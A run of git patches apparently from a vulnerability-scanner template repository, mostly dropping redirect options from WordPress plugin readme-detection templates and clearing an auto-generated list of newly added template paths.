requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wordpress-seo/readme.txt" diff --git a/technologies/wordpress/plugins/worker.yaml b/technologies/wordpress/plugins/worker.yaml index 5bcfe0eb5f..c3ea546c7a 100644 --- a/technologies/wordpress/plugins/worker.yaml +++ b/technologies/wordpress/plugins/worker.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/worker/readme.txt" diff --git a/technologies/wordpress/plugins/wp-fastest-cache.yaml b/technologies/wordpress/plugins/wp-fastest-cache.yaml index e9f00650ff..afcf808c5b 100644 --- a/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" diff --git a/technologies/wordpress/plugins/wp-file-manager.yaml b/technologies/wordpress/plugins/wp-file-manager.yaml index bef457673c..b2e5dbad00 100644 --- a/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/technologies/wordpress/plugins/wp-file-manager.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt" diff --git a/technologies/wordpress/plugins/wp-google-maps.yaml b/technologies/wordpress/plugins/wp-google-maps.yaml index 7d79c1073f..f05a5eef10 100644 --- a/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/technologies/wordpress/plugins/wp-google-maps.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-google-maps/readme.txt" diff --git a/technologies/wordpress/plugins/wp-mail-smtp.yaml b/technologies/wordpress/plugins/wp-mail-smtp.yaml index 9971b66d8b..f6fc68eb7d 100644 --- a/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp/readme.txt" diff --git a/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 4255f4dcfe..08fb4f30c9 100644 --- a/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-maintenance-mode/readme.txt" diff --git a/technologies/wordpress/plugins/wp-migrate-db.yaml b/technologies/wordpress/plugins/wp-migrate-db.yaml index 149a311895..701ea41cf0 100644 --- a/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-migrate-db/readme.txt" diff --git a/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 1ccdc68aae..387a8be99c 100644 --- a/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-multibyte-patch/readme.txt" diff --git a/technologies/wordpress/plugins/wp-optimize.yaml b/technologies/wordpress/plugins/wp-optimize.yaml index ae72975a78..fd9b6effb5 100644 --- a/technologies/wordpress/plugins/wp-optimize.yaml +++ b/technologies/wordpress/plugins/wp-optimize.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-optimize/readme.txt" diff --git a/technologies/wordpress/plugins/wp-pagenavi.yaml b/technologies/wordpress/plugins/wp-pagenavi.yaml index 98514a8473..fab475b1c9 100644 --- a/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-pagenavi/readme.txt" diff --git a/technologies/wordpress/plugins/wp-reset.yaml b/technologies/wordpress/plugins/wp-reset.yaml index 9de95aa368..f1e5d1346b 100644 --- a/technologies/wordpress/plugins/wp-reset.yaml +++ b/technologies/wordpress/plugins/wp-reset.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-reset/readme.txt" diff --git a/technologies/wordpress/plugins/wp-sitemap-page.yaml b/technologies/wordpress/plugins/wp-sitemap-page.yaml index f18d0ebc57..504a97af31 100644 --- a/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-sitemap-page/readme.txt" diff --git a/technologies/wordpress/plugins/wp-smushit.yaml b/technologies/wordpress/plugins/wp-smushit.yaml index dde7732294..84287ba592 100644 --- a/technologies/wordpress/plugins/wp-smushit.yaml +++ b/technologies/wordpress/plugins/wp-smushit.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-smushit/readme.txt" diff --git a/technologies/wordpress/plugins/wp-statistics.yaml b/technologies/wordpress/plugins/wp-statistics.yaml index 2dbea46272..50d287e916 100644 --- a/technologies/wordpress/plugins/wp-statistics.yaml +++ b/technologies/wordpress/plugins/wp-statistics.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" diff --git a/technologies/wordpress/plugins/wp-super-cache.yaml b/technologies/wordpress/plugins/wp-super-cache.yaml index 21ae70f0cd..93b590a9ed 100644 --- a/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/technologies/wordpress/plugins/wp-super-cache.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-super-cache/readme.txt" diff --git a/technologies/wordpress/plugins/wp-user-avatar.yaml b/technologies/wordpress/plugins/wp-user-avatar.yaml index 3bfe1d3a54..04c7549ce6 100644 --- a/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wp-user-avatar/readme.txt" diff --git a/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 72f67f704c..26c067ceb7 100644 --- a/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wpcf7-recaptcha/readme.txt" diff --git a/technologies/wordpress/plugins/wpcf7-redirect.yaml b/technologies/wordpress/plugins/wpcf7-redirect.yaml index ff8a6cfa26..348190e75d 100644 --- a/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wpcf7-redirect/readme.txt" diff --git a/technologies/wordpress/plugins/wpforms-lite.yaml b/technologies/wordpress/plugins/wpforms-lite.yaml index 6bc8dd16a3..746b8be966 100644 --- a/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/technologies/wordpress/plugins/wpforms-lite.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wpforms-lite/readme.txt" diff --git a/technologies/wordpress/plugins/wps-hide-login.yaml b/technologies/wordpress/plugins/wps-hide-login.yaml index 5a3b5d39a2..fd91c15731 100644 --- a/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/technologies/wordpress/plugins/wps-hide-login.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wps-hide-login/readme.txt" diff --git a/technologies/wordpress/plugins/yith-woocommerce-compare.yaml b/technologies/wordpress/plugins/yith-woocommerce-compare.yaml index 372581ccba..9c94dc2698 100644 --- a/technologies/wordpress/plugins/yith-woocommerce-compare.yaml +++ b/technologies/wordpress/plugins/yith-woocommerce-compare.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-compare/readme.txt" diff --git a/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 664a3ed7ad..1f6ba58717 100644 --- a/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/readme.txt" From 502a5f9459796fe9d141404cca37731c0e6f1e4d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 29 Dec 2022 08:57:22 +0000 Subject: [PATCH 0669/1133] Auto Generated New Template Addition List [Thu Dec 29 08:57:22 UTC 2022] :robot: --- .new-additions | 2 -- 1 file changed, 2 deletions(-) diff --git a/.new-additions b/.new-additions index 6063e6bc9d..691b82b457 100644 --- a/.new-additions +++ b/.new-additions @@ -23,8 +23,6 @@ exposed-panels/xfinity-panel.yaml exposures/logs/ws-ftp-log.yaml exposures/tokens/zenserp/zenscrape-api-key.yaml exposures/tokens/zenserp/zenserp-api-key.yaml -exposures/tokens/zeplin/zeplin-access-token.yaml -exposures/tokens/zerobounce/zerobounce-api-token.yaml iot/carel-plantvisor-panel.yaml iot/hue-personal-wireless-panel.yaml iot/raspberry-shake-config.yaml From 9a42ddb3d7cc6fed93165c59eb920a0d45adda31 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Dec 2022 15:23:10 +0530 Subject: [PATCH 0670/1133] Update exposed-dockerd.yaml --- network/exposed-dockerd.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/exposed-dockerd.yaml b/network/exposed-dockerd.yaml index fc9349d68b..3971b5da88 100644 --- a/network/exposed-dockerd.yaml +++ b/network/exposed-dockerd.yaml @@ -2,7 +2,7 @@ id: exposed-dockerd info: name: Docker Daemon Exposed - author: arafat + author: arafatansari severity: critical description: | Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. From 4bc4556b41245e71fb30ff5014581caee3b2f448 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 29 Dec 2022 12:02:21 +0000 Subject: [PATCH 0671/1133] Auto README Update [Thu Dec 29 12:02:21 UTC 2022] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index f6185d557e..e48399c704 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | | tech | 360 | princechaddha | 153 | file | 78 | | | | | -**328 directories, 4791 files**. +**335 directories, 5229 files**. From f7a08283ab29418e3c4ba60429f3068932280be8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 29 Dec 2022 13:14:37 +0000 Subject: [PATCH 0672/1133] Auto Generated New Template Addition List [Thu Dec 29 13:14:37 UTC 2022] :robot: --- .new-additions | 238 ------------------------------------------------- 1 file changed, 238 deletions(-) diff --git a/.new-additions b/.new-additions index 691b82b457..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,238 +0,0 @@ -cves/2021/CVE-2021-30128.yaml -cves/2021/CVE-2021-42887.yaml -cves/2022/CVE-2022-0786.yaml -cves/2022/CVE-2022-25082.yaml -cves/2022/CVE-2022-33891.yaml -cves/2022/CVE-2022-3768.yaml -cves/2022/CVE-2022-4260.yaml -cves/2022/CVE-2022-45362.yaml -cves/2022/CVE-2022-46381.yaml -default-logins/kanboard-default-login.yaml -default-logins/mobotix/mobotix-default-login.yaml -default-logins/tiny-file-manager-default-login.yaml -default-logins/xui-weak-login.yaml -exposed-panels/atlantis-detect.yaml -exposed-panels/content-central-login.yaml -exposed-panels/creatio-login-panel.yaml -exposed-panels/kanboard-login.yaml -exposed-panels/loxone-panel.yaml -exposed-panels/ncentral-panel.yaml -exposed-panels/posthog-admin-panel.yaml -exposed-panels/webuzo-admin-panel.yaml -exposed-panels/xfinity-panel.yaml -exposures/logs/ws-ftp-log.yaml -exposures/tokens/zenserp/zenscrape-api-key.yaml -exposures/tokens/zenserp/zenserp-api-key.yaml -iot/carel-plantvisor-panel.yaml -iot/hue-personal-wireless-panel.yaml -iot/raspberry-shake-config.yaml -miscellaneous/gpc-json.yaml -misconfiguration/installer/concrete-installer.yaml -misconfiguration/installer/dolibarr-installer.yaml -misconfiguration/sony-bravia-disclosure.yaml -network/exposed-dockerd.yaml -technologies/akamai-cache-detect.yaml -technologies/aws/amazon-ec2-detect.yaml -technologies/wordpress/plugins/ad-inserter.yaml -technologies/wordpress/plugins/add-to-any.yaml -technologies/wordpress/plugins/admin-menu-editor.yaml -technologies/wordpress/plugins/adminimize.yaml -technologies/wordpress/plugins/advanced-custom-fields.yaml -technologies/wordpress/plugins/akismet.yaml -technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml -technologies/wordpress/plugins/all-in-one-seo-pack.yaml -technologies/wordpress/plugins/all-in-one-wp-migration.yaml -technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml -technologies/wordpress/plugins/amp.yaml -technologies/wordpress/plugins/antispam-bee.yaml -technologies/wordpress/plugins/astra-sites.yaml -technologies/wordpress/plugins/astra-widgets.yaml -technologies/wordpress/plugins/autoptimize.yaml -technologies/wordpress/plugins/backwpup.yaml -technologies/wordpress/plugins/better-search-replace.yaml -technologies/wordpress/plugins/better-wp-security.yaml -technologies/wordpress/plugins/black-studio-tinymce-widget.yaml -technologies/wordpress/plugins/breadcrumb-navxt.yaml -technologies/wordpress/plugins/broken-link-checker.yaml -technologies/wordpress/plugins/child-theme-configurator.yaml -technologies/wordpress/plugins/classic-editor.yaml -technologies/wordpress/plugins/classic-widgets.yaml -technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml -technologies/wordpress/plugins/cloudflare.yaml -technologies/wordpress/plugins/cmb2.yaml -technologies/wordpress/plugins/coblocks.yaml -technologies/wordpress/plugins/code-snippets.yaml -technologies/wordpress/plugins/coming-soon.yaml -technologies/wordpress/plugins/complianz-gdpr.yaml -technologies/wordpress/plugins/contact-form-7-honeypot.yaml -technologies/wordpress/plugins/contact-form-7.yaml -technologies/wordpress/plugins/contact-form-cfdb7.yaml -technologies/wordpress/plugins/cookie-law-info.yaml -technologies/wordpress/plugins/cookie-notice.yaml -technologies/wordpress/plugins/creame-whatsapp-me.yaml -technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml -technologies/wordpress/plugins/custom-css-js.yaml -technologies/wordpress/plugins/custom-fonts.yaml -technologies/wordpress/plugins/custom-post-type-ui.yaml -technologies/wordpress/plugins/disable-comments.yaml -technologies/wordpress/plugins/disable-gutenberg.yaml -technologies/wordpress/plugins/duplicate-page.yaml -technologies/wordpress/plugins/duplicate-post.yaml -technologies/wordpress/plugins/duplicator.yaml -technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml -technologies/wordpress/plugins/easy-fancybox.yaml -technologies/wordpress/plugins/easy-google-fonts.yaml -technologies/wordpress/plugins/easy-table-of-contents.yaml -technologies/wordpress/plugins/easy-wp-smtp.yaml -technologies/wordpress/plugins/elementor.yaml -technologies/wordpress/plugins/elementskit-lite.yaml -technologies/wordpress/plugins/enable-media-replace.yaml -technologies/wordpress/plugins/envato-elements.yaml -technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml -technologies/wordpress/plugins/ewww-image-optimizer.yaml -technologies/wordpress/plugins/facebook-for-woocommerce.yaml -technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml -technologies/wordpress/plugins/flamingo.yaml -technologies/wordpress/plugins/fluentform.yaml -technologies/wordpress/plugins/font-awesome.yaml -technologies/wordpress/plugins/force-regenerate-thumbnails.yaml -technologies/wordpress/plugins/formidable.yaml -technologies/wordpress/plugins/forminator.yaml -technologies/wordpress/plugins/ga-google-analytics.yaml -technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml -technologies/wordpress/plugins/google-analytics-for-wordpress.yaml -technologies/wordpress/plugins/google-listings-and-ads.yaml -technologies/wordpress/plugins/google-site-kit.yaml -technologies/wordpress/plugins/google-sitemap-generator.yaml -technologies/wordpress/plugins/gtranslate.yaml -technologies/wordpress/plugins/gutenberg.yaml -technologies/wordpress/plugins/happy-elementor-addons.yaml -technologies/wordpress/plugins/header-and-footer-scripts.yaml -technologies/wordpress/plugins/header-footer-code-manager.yaml -technologies/wordpress/plugins/header-footer-elementor.yaml -technologies/wordpress/plugins/header-footer.yaml -technologies/wordpress/plugins/health-check.yaml -technologies/wordpress/plugins/hello-dolly.yaml -technologies/wordpress/plugins/imagify.yaml -technologies/wordpress/plugins/imsanity.yaml -technologies/wordpress/plugins/insert-headers-and-footers.yaml -technologies/wordpress/plugins/instagram-feed.yaml -technologies/wordpress/plugins/intuitive-custom-post-order.yaml -technologies/wordpress/plugins/iwp-client.yaml -technologies/wordpress/plugins/jetpack.yaml -technologies/wordpress/plugins/kadence-blocks.yaml -technologies/wordpress/plugins/kirki.yaml -technologies/wordpress/plugins/leadin.yaml -technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml -technologies/wordpress/plugins/limit-login-attempts.yaml -technologies/wordpress/plugins/litespeed-cache.yaml -technologies/wordpress/plugins/loco-translate.yaml -technologies/wordpress/plugins/loginizer.yaml -technologies/wordpress/plugins/loginpress.yaml -technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml -technologies/wordpress/plugins/mailchimp-for-wp.yaml -technologies/wordpress/plugins/mailpoet.yaml -technologies/wordpress/plugins/maintenance.yaml -technologies/wordpress/plugins/mainwp-child.yaml -technologies/wordpress/plugins/malcare-security.yaml -technologies/wordpress/plugins/megamenu.yaml -technologies/wordpress/plugins/members.yaml -technologies/wordpress/plugins/meta-box.yaml -technologies/wordpress/plugins/ml-slider.yaml -technologies/wordpress/plugins/newsletter.yaml -technologies/wordpress/plugins/nextend-facebook-connect.yaml -technologies/wordpress/plugins/nextgen-gallery.yaml -technologies/wordpress/plugins/ninja-forms.yaml -technologies/wordpress/plugins/ocean-extra.yaml -technologies/wordpress/plugins/official-facebook-pixel.yaml -technologies/wordpress/plugins/one-click-demo-import.yaml -technologies/wordpress/plugins/optinmonster.yaml -technologies/wordpress/plugins/password-protected.yaml -technologies/wordpress/plugins/pdf-embedder.yaml -technologies/wordpress/plugins/photo-gallery.yaml -technologies/wordpress/plugins/php-compatibility-checker.yaml -technologies/wordpress/plugins/pixelyoursite.yaml -technologies/wordpress/plugins/polylang.yaml -technologies/wordpress/plugins/popup-builder.yaml -technologies/wordpress/plugins/popup-maker.yaml -technologies/wordpress/plugins/post-smtp.yaml -technologies/wordpress/plugins/post-types-order.yaml -technologies/wordpress/plugins/premium-addons-for-elementor.yaml -technologies/wordpress/plugins/pretty-link.yaml -technologies/wordpress/plugins/really-simple-captcha.yaml -technologies/wordpress/plugins/really-simple-ssl.yaml -technologies/wordpress/plugins/redirection.yaml -technologies/wordpress/plugins/redux-framework.yaml -technologies/wordpress/plugins/regenerate-thumbnails.yaml -technologies/wordpress/plugins/safe-svg.yaml -technologies/wordpress/plugins/seo-by-rank-math.yaml -technologies/wordpress/plugins/sg-cachepress.yaml -technologies/wordpress/plugins/sg-security.yaml -technologies/wordpress/plugins/shortcodes-ultimate.yaml -technologies/wordpress/plugins/shortpixel-image-optimiser.yaml -technologies/wordpress/plugins/simple-custom-post-order.yaml -technologies/wordpress/plugins/simple-page-ordering.yaml -technologies/wordpress/plugins/siteguard.yaml -technologies/wordpress/plugins/siteorigin-panels.yaml -technologies/wordpress/plugins/smart-slider-3.yaml -technologies/wordpress/plugins/so-widgets-bundle.yaml -technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml -technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml -technologies/wordpress/plugins/sucuri-scanner.yaml -technologies/wordpress/plugins/svg-support.yaml -technologies/wordpress/plugins/table-of-contents-plus.yaml -technologies/wordpress/plugins/tablepress.yaml -technologies/wordpress/plugins/taxonomy-terms-order.yaml -technologies/wordpress/plugins/the-events-calendar.yaml -technologies/wordpress/plugins/themeisle-companion.yaml -technologies/wordpress/plugins/tinymce-advanced.yaml -technologies/wordpress/plugins/translatepress-multilingual.yaml -technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml -technologies/wordpress/plugins/under-construction-page.yaml -technologies/wordpress/plugins/unyson.yaml -technologies/wordpress/plugins/updraftplus.yaml -technologies/wordpress/plugins/use-any-font.yaml -technologies/wordpress/plugins/user-role-editor.yaml -technologies/wordpress/plugins/velvet-blues-update-urls.yaml -technologies/wordpress/plugins/w3-total-cache.yaml -technologies/wordpress/plugins/webp-converter-for-media.yaml -technologies/wordpress/plugins/widget-importer-exporter.yaml -technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml -technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml -technologies/wordpress/plugins/woo-variation-swatches.yaml -technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml -technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml -technologies/wordpress/plugins/woocommerce-payments.yaml -technologies/wordpress/plugins/woocommerce-paypal-payments.yaml -technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml -technologies/wordpress/plugins/woocommerce-services.yaml -technologies/wordpress/plugins/woocommerce.yaml -technologies/wordpress/plugins/woosidebars.yaml -technologies/wordpress/plugins/wordfence.yaml -technologies/wordpress/plugins/wordpress-importer.yaml -technologies/wordpress/plugins/wordpress-seo.yaml -technologies/wordpress/plugins/worker.yaml -technologies/wordpress/plugins/wp-fastest-cache.yaml -technologies/wordpress/plugins/wp-file-manager.yaml -technologies/wordpress/plugins/wp-google-maps.yaml -technologies/wordpress/plugins/wp-mail-smtp.yaml -technologies/wordpress/plugins/wp-maintenance-mode.yaml -technologies/wordpress/plugins/wp-migrate-db.yaml -technologies/wordpress/plugins/wp-multibyte-patch.yaml -technologies/wordpress/plugins/wp-optimize.yaml -technologies/wordpress/plugins/wp-pagenavi.yaml -technologies/wordpress/plugins/wp-reset.yaml -technologies/wordpress/plugins/wp-sitemap-page.yaml -technologies/wordpress/plugins/wp-smushit.yaml -technologies/wordpress/plugins/wp-statistics.yaml -technologies/wordpress/plugins/wp-super-cache.yaml -technologies/wordpress/plugins/wp-user-avatar.yaml -technologies/wordpress/plugins/wpcf7-recaptcha.yaml -technologies/wordpress/plugins/wpcf7-redirect.yaml -technologies/wordpress/plugins/wpforms-lite.yaml -technologies/wordpress/plugins/wps-hide-login.yaml -technologies/wordpress/plugins/yith-woocommerce-compare.yaml -technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml -vulnerabilities/amazon/amazon-ec2-ssrf.yaml -vulnerabilities/other/digital-ocean-ssrf.yaml -vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml From 7d08d97c73d0482c37075707e41ddc714c7115f6 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 29 Dec 2022 18:45:38 +0530 Subject: [PATCH 0673/1133] Adding master to main (#6445) * Auto Generated New Template Addition List [Tue Dec 20 10:09:39 UTC 2022] :robot: * Auto Generated CVE annotations [Tue Dec 20 10:25:15 UTC 2022] :robot: * Add Liferay favicon * fix-yaml-lint * Auto Generated New Template Addition List [Tue Dec 27 14:14:08 UTC 2022] :robot: * Auto Generated CVE annotations [Tue Dec 27 14:32:24 UTC 2022] :robot: * Auto Generated New Template Addition List [Thu Dec 29 13:14:37 UTC 2022] :robot: Co-authored-by: GitHub Action Co-authored-by: nodauf Co-authored-by: Dhiyaneshwaran Co-authored-by: pussycat0x <65701233+pussycat0x@users.noreply.github.com> --- .new-additions | 238 ------------------------------- cves/2020/CVE-2020-35476.yaml | 3 +- cves/2022/CVE-2022-23854.yaml | 3 +- technologies/favicon-detect.yaml | 5 + 4 files changed, 9 insertions(+), 240 deletions(-) diff --git a/.new-additions b/.new-additions index 691b82b457..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,238 +0,0 @@ -cves/2021/CVE-2021-30128.yaml -cves/2021/CVE-2021-42887.yaml -cves/2022/CVE-2022-0786.yaml -cves/2022/CVE-2022-25082.yaml -cves/2022/CVE-2022-33891.yaml -cves/2022/CVE-2022-3768.yaml -cves/2022/CVE-2022-4260.yaml -cves/2022/CVE-2022-45362.yaml -cves/2022/CVE-2022-46381.yaml -default-logins/kanboard-default-login.yaml -default-logins/mobotix/mobotix-default-login.yaml -default-logins/tiny-file-manager-default-login.yaml -default-logins/xui-weak-login.yaml -exposed-panels/atlantis-detect.yaml -exposed-panels/content-central-login.yaml -exposed-panels/creatio-login-panel.yaml -exposed-panels/kanboard-login.yaml -exposed-panels/loxone-panel.yaml -exposed-panels/ncentral-panel.yaml -exposed-panels/posthog-admin-panel.yaml -exposed-panels/webuzo-admin-panel.yaml -exposed-panels/xfinity-panel.yaml -exposures/logs/ws-ftp-log.yaml -exposures/tokens/zenserp/zenscrape-api-key.yaml -exposures/tokens/zenserp/zenserp-api-key.yaml -iot/carel-plantvisor-panel.yaml -iot/hue-personal-wireless-panel.yaml -iot/raspberry-shake-config.yaml -miscellaneous/gpc-json.yaml -misconfiguration/installer/concrete-installer.yaml -misconfiguration/installer/dolibarr-installer.yaml -misconfiguration/sony-bravia-disclosure.yaml -network/exposed-dockerd.yaml -technologies/akamai-cache-detect.yaml -technologies/aws/amazon-ec2-detect.yaml -technologies/wordpress/plugins/ad-inserter.yaml -technologies/wordpress/plugins/add-to-any.yaml -technologies/wordpress/plugins/admin-menu-editor.yaml -technologies/wordpress/plugins/adminimize.yaml -technologies/wordpress/plugins/advanced-custom-fields.yaml -technologies/wordpress/plugins/akismet.yaml -technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml -technologies/wordpress/plugins/all-in-one-seo-pack.yaml -technologies/wordpress/plugins/all-in-one-wp-migration.yaml -technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml -technologies/wordpress/plugins/amp.yaml -technologies/wordpress/plugins/antispam-bee.yaml -technologies/wordpress/plugins/astra-sites.yaml -technologies/wordpress/plugins/astra-widgets.yaml -technologies/wordpress/plugins/autoptimize.yaml -technologies/wordpress/plugins/backwpup.yaml -technologies/wordpress/plugins/better-search-replace.yaml -technologies/wordpress/plugins/better-wp-security.yaml -technologies/wordpress/plugins/black-studio-tinymce-widget.yaml -technologies/wordpress/plugins/breadcrumb-navxt.yaml -technologies/wordpress/plugins/broken-link-checker.yaml -technologies/wordpress/plugins/child-theme-configurator.yaml -technologies/wordpress/plugins/classic-editor.yaml -technologies/wordpress/plugins/classic-widgets.yaml -technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml -technologies/wordpress/plugins/cloudflare.yaml -technologies/wordpress/plugins/cmb2.yaml -technologies/wordpress/plugins/coblocks.yaml -technologies/wordpress/plugins/code-snippets.yaml -technologies/wordpress/plugins/coming-soon.yaml -technologies/wordpress/plugins/complianz-gdpr.yaml -technologies/wordpress/plugins/contact-form-7-honeypot.yaml -technologies/wordpress/plugins/contact-form-7.yaml -technologies/wordpress/plugins/contact-form-cfdb7.yaml -technologies/wordpress/plugins/cookie-law-info.yaml -technologies/wordpress/plugins/cookie-notice.yaml -technologies/wordpress/plugins/creame-whatsapp-me.yaml -technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml -technologies/wordpress/plugins/custom-css-js.yaml -technologies/wordpress/plugins/custom-fonts.yaml -technologies/wordpress/plugins/custom-post-type-ui.yaml -technologies/wordpress/plugins/disable-comments.yaml -technologies/wordpress/plugins/disable-gutenberg.yaml -technologies/wordpress/plugins/duplicate-page.yaml -technologies/wordpress/plugins/duplicate-post.yaml -technologies/wordpress/plugins/duplicator.yaml -technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml -technologies/wordpress/plugins/easy-fancybox.yaml -technologies/wordpress/plugins/easy-google-fonts.yaml -technologies/wordpress/plugins/easy-table-of-contents.yaml -technologies/wordpress/plugins/easy-wp-smtp.yaml -technologies/wordpress/plugins/elementor.yaml -technologies/wordpress/plugins/elementskit-lite.yaml -technologies/wordpress/plugins/enable-media-replace.yaml -technologies/wordpress/plugins/envato-elements.yaml -technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml -technologies/wordpress/plugins/ewww-image-optimizer.yaml -technologies/wordpress/plugins/facebook-for-woocommerce.yaml -technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml -technologies/wordpress/plugins/flamingo.yaml -technologies/wordpress/plugins/fluentform.yaml 